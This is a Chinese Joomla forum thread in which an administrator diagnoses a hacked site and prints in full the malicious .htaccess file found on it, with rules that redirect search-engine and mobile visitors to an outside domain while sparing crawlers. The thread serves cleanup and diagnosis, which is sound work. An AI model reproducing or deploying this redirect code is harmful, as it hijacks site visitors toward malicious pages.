×
想要你的问题尽快得到站长解答吗? (2011-02-24)

站长的时间很有限,只回复“付费会员”提出的问题。想要你的问题尽快得到站长解答吗?请升级到付费会员。

升级方法: www.joomlagate.com/index.php?option=com_kunena&view=topic&catid=2&id=15442&Itemid=154

已解决 网站被恶意转址,是A Record问题还是网站本身被骇了?

更多
2017年06月05日 21:18 #1 作者: Sevenway
Sevenway 创建了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?

本帖含有机密信息


1.网站是2.5版本
2.网站空间跟网址是分开购买的
3.网址有做A Record

目前怀疑转址可能被窜改(可能性低),或是网站本身被黑,但直接输入网址却可以正常显示?

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月05日 21:59 #2 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
我在搜索引擎里面测试了一下,发现搜索结果的链接,就同一个链接(页面未刷新),如果点击多次,那么会发现被跳转的恶意网址也在变化。也就是说,并非一直转向固定的网址,而是多个网址不断变化。

同时,如果直接在浏览器地址栏输入你们网站的域名,则可以打开你们网站正常的首页。

这提示黑客可能在你们网站上放置了特殊的恶意代码,故意只针对搜索结果生效来跳转,对于直接输入网址就不做理会,这样就可以“嫁祸于人”,让你们误以为是搜索引擎出了问题,实际上跟搜索引擎没有关系。搜索引擎的搜索结果已经把链接指向了你们网站,但是黑客放置的恶意代码会自动判断这个访问请求是直接访问(direct URL)还是引荐访问(referred visitor),如果是后者,就立即跳转。


如果要解决这个问题,必须对你网站的内容进行一次仔细的梳理,找出恶意代码,然后清除它,然后做好网站的安全加固 —— 你之前一直使用 Joomla 2.5 核心就是一个失误,应该及时升级 Joomla 核心的。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

pCloud 免费网盘 10GB 超大空间 免费注册
更多
2017年06月06日 21:03 #3 作者: Sevenway
Sevenway 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
老师你说的那个方式,该如何进行?
对目前网站有什么风险吗
能协助解决这问题吗

登录 或者   注册一个会员帐号 来参与讨论

性价比超高的Joomla云主机
更多
2017年06月06日 21:24 #4 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
请把你网站的全站备份发给我,我需要在我的测试服务器上还原出来这个网站,然后在上面进行操作,这样可以避免“万一失误就弄坏了你的正式网站”。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月09日 16:17 #5 作者: Sevenway
Sevenway 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
已将备份发给您,烦请协助一下~

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月09日 17:23 #6 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
你发的备份包内容很奇怪,我不会用。

请用 Joomla 自己的备份工具 Akeeba Backup 制作全站备份包然后发给我,谢谢!

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月10日 21:45 #7 作者: Sevenway
Sevenway 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
我安装上去了,3.4.6版本
再烦请老师协助了

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月11日 07:01 #8 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
我拿到你网站的备份包之后,在我的 PC 上面解压,刚刚完成解压,我的杀毒软件就开始报警!提示染毒的文件名是 .htaccess, 这个文件单从文件名看上去是 Joomla 的一个正常文件,因为 Joomla 根目录下的 htaccess.txt 文件在开启 SEF 时需要改名为 .htaccess ,然鹅,令人震惊的事实是:你网站上各种目录下均有这个文件,总数超过100个(无法准确统计,因为瞬间就被杀毒软件删除了若干),该文件的内容是:
# BEGIN W0RDPRESS
#<IfModule mod_rewrite.c>
#RewriteEngine On
#RewriteBase /
#RewriteCond %{REQUEST_FILENAME} !-f
#RewriteCond %{REQUEST_FILENAME} !-d
#RewriteRule . /index.php [L]
#</IfModule>
# END WordPress
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://portal-c.pw/XcTyTp [R,L]
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]
RewriteCond %{HTTP_USER_AGENT} !unix [NC]
RewriteCond %{HTTP_USER_AGENT} !macos [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]
RewriteCond %{HTTP_USER_AGENT} !google [NC]
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]
RewriteCond %{HTTP_USER_AGENT} !bot [NC]
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]
RewriteCond %{HTTP_USER_AGENT} !msn [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]
RewriteCond %{HTTP_USER_AGENT} !maui [NC]
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://portal-c.pw/XcTyTp [L,R=302]

仔细看看这个文件,里面充满了各种搜索引擎的爬虫适配规则!这就是为什么从搜索引擎的搜索结果中点击你网站链接时会被跳转到其它网站 —— 因为 .htaccess 本身就是一个优先执行的文件!

所以,很显然: 你的网站被黑客攻击了!

我之前就多次提醒过大家:一定要及时升级 Joomla 网站核心。但是你一直停留在 Joomla 2.5.28 版本不肯升级,这就埋下了隐患。黑客攻击这些老版本是轻而易举的,因为旧版本或多或少都存在一些漏洞。

当然了,你网站上或许还存在其它的染毒文件,要彻底解决,需要专业的安全知识,我毕竟没那么专业。

我可以尝试帮你修复,不过,如果你不放心,可以寻找专业的网络安全公司,请他们来彻底查毒、杀毒。最后,别忘了把网站核心升级到最新的 Joomla 3.7.2,并在以后经常、及时升级核心及安装的所有扩展。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月11日 07:12 #9 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
上面那个恶意文件末尾的网址,就是用来跳转的。

目前临时的一个解决方案是:将你网站上所有的 .htaccess 文件均删除。

鉴于你网站已开启 SEF,那么,请从 Joomla 2.5.28 的安装包(纯净无毒的)里面提取根目录下的 htaccess.txt ,然后改名为 .htaccess 并上传到你网站根目录下。这么做之后,可以临时解决“搜索结果跳转”的问题,但是这个方法并不能堵上你网站(或许是服务器)的安全漏洞。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月11日 07:35 #10 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
刚刚在你网站备份包的文件系统中又发现两个可疑目录:

/modules/mod_aratiipas

/modules/mod_aratiip


这两个模块的名称看起来怪怪的,查看其目录内容,里面的 XML 文件里面写有俄文(很多黑客都是俄文地区的),同时 XML 文件里面提供的 email 邮箱域名是 hell.com ,你觉得正常人会用这样的邮箱吗?

同时我注意到,/modules/mod_aratiipas/error_log 这个文件竟然达到 300MB 之大!很显然这不是 Joomla 或者其正常扩展的一贯作风。之前不知道它的存在,导致网站备份包体积达到 453MB;跳过(我没有权限从你网站删除它)该文件,备份包的大小马上降到 96MB 左右。

上述种种奇怪之处,更加证明你的网站确确实实是被黑客攻击了。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月11日 22:00 #11 作者: Sevenway
Sevenway 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
那可以麻烦老师协助修复看看吗?

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月12日 18:46 #12 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
请提供一下你网站的 FTP 账号,或者是服务器管理账号(通过服务器的文件管理系统更容易操作),我来帮你清除这些恶意代码。

如果想网站“长治久安”,最好尽快将网站升级到最新版 Joomla 3.7.2 核心。要是你自己升级有困难,我可以提供收费服务。旺旺详谈。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年06月12日 23:14 #13 作者: Joomla之门
Joomla之门 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
刚刚根据你提供的 FTP 账号,已经帮你替换了网站根目录下的原来含有恶意代码的 .htaccess 文件。现在从搜索引擎的搜索结果中点击你网站的链接,应该不会再发生被跳转到其它网站的问题了。你试试看。

付费下载 Joomla 3 扩展汉化版: 我要付费支持 Joomla 之门!

登录 或者   注册一个会员帐号 来参与讨论

更多
2017年08月12日 16:06 - 2017年08月12日 16:09 #14 作者: Sevenway
Sevenway 回复了话题: 网站被恶意转址,是A Record问题还是网站本身被骇了?
我已經把FTP的資料都刪除了,
也重新以3.0核心架設一個新的網站,
資料庫也重新建立了,
為何網站還是被轉址到其他地方?
(原來造成的問題依然存在)
是我還有什麼步驟錯誤的嗎?
或是哪個資料沒刪除造成的呢?
最后修改: 2017年08月12日 16:09 作者: Sevenway.

登录 或者   注册一个会员帐号 来参与讨论